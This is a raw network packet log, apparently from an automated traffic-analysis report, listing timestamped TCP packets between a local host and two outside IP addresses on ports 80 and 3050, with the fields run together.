                                              Apr 26, 2024 07:40:37.919359922 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:37.919368982 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:37.919420004 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.174751043 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.174777985 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.174818993 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.174832106 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.174859047 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.174894094 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.174935102 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.174947023 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.174973965 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.174979925 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.175014019 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.175019979 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.175054073 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.175060034 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.175100088 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.175127983 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.175180912 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.175204992 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.175259113 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.175276041 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.175316095 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.175329924 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.175362110 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.175390005 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.175431967 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.175441980 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.175470114 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.175477028 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.175520897 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.175580025 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.175620079 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.175622940 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.175658941 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.175662994 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.175704956 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.175717115 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.175750971 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.175782919 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.175832033 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.175862074 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.175915003 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.175936937 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.175982952 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.176011086 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.176062107 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.176085949 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.176141977 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.176284075 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.176338911 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.176361084 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.176399946 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.176414013 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.176450014 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.176477909 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.176527023 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.176619053 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.176667929 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.176759005 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.176812887 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.176839113 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.176903009 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.176932096 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.176981926 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.177006960 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.177056074 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.177081108 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.177119970 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.177131891 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.177162886 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.177195072 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.177234888 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.177248001 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.177273035 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.177339077 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.177378893 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.177390099 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.177412033 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.177416086 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.177434921 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.177457094 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.177470922 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.177550077 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.177583933 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.177596092 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.177623034 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.177656889 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.177690983 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.177700043 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.177731037 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.177791119 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.177836895 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.177843094 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.177886009 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.177896023 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.177938938 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.177977085 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.178028107 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.178050041 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.178102016 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.178153992 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.178203106 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.178203106 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.178253889 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.178270102 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.178307056 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.178319931 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.178349018 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.178359985 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.178404093 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.178410053 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.178481102 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.178508043 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.178556919 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.178570986 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.178606033 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.178616047 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.178643942 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.178714037 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.178766012 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.178780079 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.178844929 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.178950071 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.178972006 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.178991079 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.179003954 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.179027081 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.179028988 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.179050922 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.179069042 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.179086924 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.179109097 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.179147005 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.179162025 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.179213047 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.179373980 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.179420948 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.179502964 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.179609060 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.419275999 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.419437885 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.419445992 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.419478893 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.419517994 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.419559956 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.419575930 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.419625998 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.419764042 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.419807911 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.419816017 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.419867039 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.419913054 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.419959068 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.420064926 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.420141935 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.420371056 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.420418024 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.420434952 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.420480013 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.420507908 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.420552015 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.420597076 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.420641899 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.420658112 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.420691013 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.420697927 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.420728922 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.420772076 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.420819044 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.420840979 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.420885086 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.420908928 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.420954943 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.421030998 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.421076059 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.421148062 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.421190023 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.421236038 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.421302080 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.421305895 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.421346903 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.421375036 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.421420097 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.421471119 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.421516895 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.421689987 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.421739101 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.421766996 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.421809912 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.421822071 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.421864986 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.421868086 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.421907902 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.421952963 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.421997070 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.422003984 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.422039986 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.422068119 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.422112942 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.422158003 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.422204971 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.422233105 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.422275066 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.422297001 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.422342062 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.422357082 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.422390938 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.422404051 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.422430992 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.422594070 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.422641039 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.422878981 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.422925949 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.422954082 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.422998905 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.423043966 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.423093081 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.423135996 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.423181057 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.423202991 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.423247099 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.423290014 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.423341036 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.423384905 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.423435926 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.423451900 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.423495054 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.423522949 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.423568964 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.423584938 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.423624039 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.423626900 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.423670053 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.423726082 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.423767090 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.423809052 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.423847914 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.423892975 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.423940897 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.423954010 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.423995972 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.424000978 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.424047947 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.424077988 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.424129009 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.424144983 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.424190044 CEST4971480192.168.2.546.254.34.12
                                              Apr 26, 2024 07:40:38.424218893 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:38.424257994 CEST804971446.254.34.12192.168.2.5
                                              Apr 26, 2024 07:40:43.572647095 CEST30504971645.88.90.110192.168.2.5
                                              Apr 26, 2024 07:40:43.572648048 CEST497163050192.168.2.545.88.90.110
                                              Apr 26, 2024 07:40:43.572716951 CEST30504971645.88.90.110192.168.2.5
                                              Apr 26, 2024 07:40:43.572779894 CEST30504971645.88.90.110192.168.2.5
                                              Apr 26, 2024 07:40:43.572793007 CEST30504971645.88.90.110192.168.2.5
                                              Apr 26, 2024 07:40:43.572817087 CEST497163050192.168.2.545.88.90.110
                                              Apr 26, 2024 07:40:43.572844982 CEST497163050192.168.2.545.88.90.110
                                              Apr 26, 2024 07:40:43.572882891 CEST30504971645.88.90.110192.168.2.5
                                              Apr 26, 2024 07:40:43.572941065 CEST30504971645.88.90.110192.168.2.5
                                              Apr 26, 2024 07:40:43.572990894 CEST30504971645.88.90.110192.168.2.5
                                              Apr 26, 2024 07:40:43.573030949 CEST497163050192.168.2.545.88.90.110
                                              Apr 26, 2024 07:40:43.573088884 CEST30504971645.88.90.110192.168.2.5
                                              Apr 26, 2024 07:40:43.573127031 CEST497163050192.168.2.545.88.90.110
                                              Apr 26, 2024 07:40:43.573256969 CEST30504971645.88.90.110192.168.2.5
                                              Apr 26, 2024 07:40:43.573334932 CEST30504971645.88.90.110192.168.2.5
                                              Apr 26, 2024 07:40:43.573407888 CEST497163050192.168.2.545.88.90.110
                                              Apr 26, 2024 07:40:43.573415041 CEST30504971645.88.90.110192.168.2.5
                                              Apr 26, 2024 07:40:43.573496103 CEST30504971645.88.90.110192.168.2.5
                                              Apr 26, 2024 07:40:43.573542118 CEST497163050192.168.2.545.88.90.110
                                              Apr 26, 2024 07:40:43.573568106 CEST30504971645.88.90.110192.168.2.5
                                              Apr 26, 2024 07:40:43.573648930 CEST30504971645.88.90.110192.168.2.5
                                              Apr 26, 2024 07:40:43.573683023 CEST497163050192.168.2.545.88.90.110
                                              Apr 26, 2024 07:40:43.573826075 CEST30504971645.88.90.110192.168.2.5
                                              Apr 26, 2024 07:40:43.573843002 CEST30504971645.88.90.110192.168.2.5
                                              Apr 26, 2024 07:40:43.573856115 CEST30504971645.88.90.110192.168.2.5
                                              Apr 26, 2024 07:40:43.573895931 CEST497163050192.168.2.545.88.90.110
                                              Apr 26, 2024 07:40:43.573981047 CEST30504971645.88.90.110192.168.2.5
                                              Apr 26, 2024 07:40:43.574019909 CEST497163050192.168.2.545.88.90.110
                                              Apr 26, 2024 07:40:43.574038982 CEST30504971645.88.90.110192.168.2.5
                                              Apr 26, 2024 07:40:43.574117899 CEST30504971645.88.90.110192.168.2.5
                                              Apr 26, 2024 07:40:43.574132919 CEST30504971645.88.90.110192.168.2.5
                                              Apr 26, 2024 07:40:43.574146986 CEST30504971645.88.90.110192.168.2.5
                                              Apr 26, 2024 07:40:43.574153900 CEST497163050192.168.2.545.88.90.110
                                              Apr 26, 2024 07:40:43.574173927 CEST30504971645.88.90.110192.168.2.5
                                              Apr 26, 2024 07:40:43.574187040 CEST497163050192.168.2.545.88.90.110
                                              Apr 26, 2024 07:40:43.574202061 CEST30504971645.88.90.110192.168.2.5
                                              Apr 26, 2024 07:40:43.574282885 CEST30504971645.88.90.110192.168.2.5
                                              Apr 26, 2024 07:40:43.574296951 CEST30504971645.88.90.110192.168.2.5
                                              Apr 26, 2024 07:40:43.574317932 CEST30504971645.88.90.110192.168.2.5
                                              Apr 26, 2024 07:40:43.574321032 CEST497163050192.168.2.545.88.90.110
                                              Apr 26, 2024 07:40:43.574346066 CEST497163050192.168.2.545.88.90.110
                                              Apr 26, 2024 07:40:43.574368954 CEST30504971645.88.90.110192.168.2.5
                                              Apr 26, 2024 07:40:43.574383974 CEST30504971645.88.90.110192.168.2.5
                                              Apr 26, 2024 07:40:43.574414968 CEST30504971645.88.90.110192.168.2.5
                                              Apr 26, 2024 07:40:43.574421883 CEST497163050192.168.2.545.88.90.110
                                              Apr 26, 2024 07:40:43.574431896 CEST30504971645.88.90.110192.168.2.5
                                              Apr 26, 2024 07:40:43.574445963 CEST30504971645.88.90.110192.168.2.5
                                              Apr 26, 2024 07:40:43.574454069 CEST497163050192.168.2.545.88.90.110
                                              Apr 26, 2024 07:40:43.574462891 CEST30504971645.88.90.110192.168.2.5
                                              Apr 26, 2024 07:40:43.574479103 CEST497163050192.168.2.545.88.90.110
                                              Apr 26, 2024 07:40:43.574513912 CEST30504971645.88.90.110192.168.2.5
                                              Apr 26, 2024 07:40:43.574554920 CEST30504971645.88.90.110192.168.2.5
                                              Apr 26, 2024 07:40:43.574569941 CEST497163050192.168.2.545.88.90.110
                                              Apr 26, 2024 07:40:43.574593067 CEST30504971645.88.90.110192.168.2.5
                                              Apr 26, 2024 07:40:43.574620008 CEST30504971645.88.90.110192.168.2.5
                                              Apr 26, 2024 07:40:43.574667931 CEST30504971645.88.90.110192.168.2.5
                                              Apr 26, 2024 07:40:43.574681044 CEST30504971645.88.90.110192.168.2.5
                                              Apr 26, 2024 07:40:43.574681997 CEST497163050192.168.2.545.88.90.110
                                              Apr 26, 2024 07:40:43.574706078 CEST30504971645.88.90.110192.168.2.5
                                              Apr 26, 2024 07:40:43.574728966 CEST497163050192.168.2.545.88.90.110
                                              Apr 26, 2024 07:40:43.574742079 CEST497163050192.168.2.545.88.90.110
                                              Apr 26, 2024 07:40:43.574754953 CEST30504971645.88.90.110192.168.2.5
                                              Apr 26, 2024 07:40:43.574769020 CEST30504971645.88.90.110192.168.2.5
                                              Apr 26, 2024 07:40:43.574791908 CEST30504971645.88.90.110192.168.2.5
                                              Apr 26, 2024 07:40:43.574805021 CEST30504971645.88.90.110192.168.2.5
                                              Apr 26, 2024 07:40:43.574805021 CEST497163050192.168.2.545.88.90.110
                                              Apr 26, 2024 07:40:43.574819088 CEST30504971645.88.90.110192.168.2.5
                                              Apr 26, 2024 07:40:43.574835062 CEST30504971645.88.90.110192.168.2.5
                                              Apr 26, 2024 07:40:43.574856997 CEST497163050192.168.2.545.88.90.110
                                              Apr 26, 2024 07:40:43.574872017 CEST30504971645.88.90.110192.168.2.5
                                              Apr 26, 2024 07:40:43.574882984 CEST497163050192.168.2.545.88.90.110
                                              Apr 26, 2024 07:40:43.574898005 CEST30504971645.88.90.110192.168.2.5
                                              Apr 26, 2024 07:40:43.574924946 CEST30504971645.88.90.110192.168.2.5
                                              Apr 26, 2024 07:40:43.574938059 CEST30504971645.88.90.110192.168.2.5
                                              Apr 26, 2024 07:40:43.574948072 CEST497163050192.168.2.545.88.90.110
                                              Apr 26, 2024 07:40:43.574951887 CEST30504971645.88.90.110192.168.2.5
                                              Apr 26, 2024 07:40:43.574966908 CEST30504971645.88.90.110192.168.2.5
                                              Apr 26, 2024 07:40:43.574973106 CEST497163050192.168.2.545.88.90.110
                                              Apr 26, 2024 07:40:43.575000048 CEST497163050192.168.2.545.88.90.110
                                              Apr 26, 2024 07:40:43.575005054 CEST30504971645.88.90.110192.168.2.5
                                              Apr 26, 2024 07:40:43.575030088 CEST30504971645.88.90.110192.168.2.5
                                              Apr 26, 2024 07:40:43.575053930 CEST30504971645.88.90.110192.168.2.5
                                              Apr 26, 2024 07:40:43.575064898 CEST497163050192.168.2.545.88.90.110
                                              Apr 26, 2024 07:40:43.575100899 CEST30504971645.88.90.110192.168.2.5
                                              Apr 26, 2024 07:40:43.575139999 CEST497163050192.168.2.545.88.90.110
                                              Apr 26, 2024 07:40:43.575145960 CEST30504971645.88.90.110192.168.2.5
                                              Apr 26, 2024 07:40:43.575160980 CEST30504971645.88.90.110192.168.2.5
                                              Apr 26, 2024 07:40:43.575186014 CEST30504971645.88.90.110192.168.2.5
                                              Apr 26, 2024 07:40:43.575205088 CEST30504971645.88.90.110192.168.2.5
                                              Apr 26, 2024 07:40:43.575205088 CEST497163050192.168.2.545.88.90.110
                                              Apr 26, 2024 07:40:43.575231075 CEST30504971645.88.90.110192.168.2.5
                                              Apr 26, 2024 07:40:43.575249910 CEST497163050192.168.2.545.88.90.110
                                              Apr 26, 2024 07:40:43.575273991 CEST30504971645.88.90.110192.168.2.5
                                              Apr 26, 2024 07:40:43.575289965 CEST30504971645.88.90.110192.168.2.5
                                              Apr 26, 2024 07:40:43.575313091 CEST30504971645.88.90.110192.168.2.5
                                              Apr 26, 2024 07:40:43.575316906 CEST497163050192.168.2.545.88.90.110
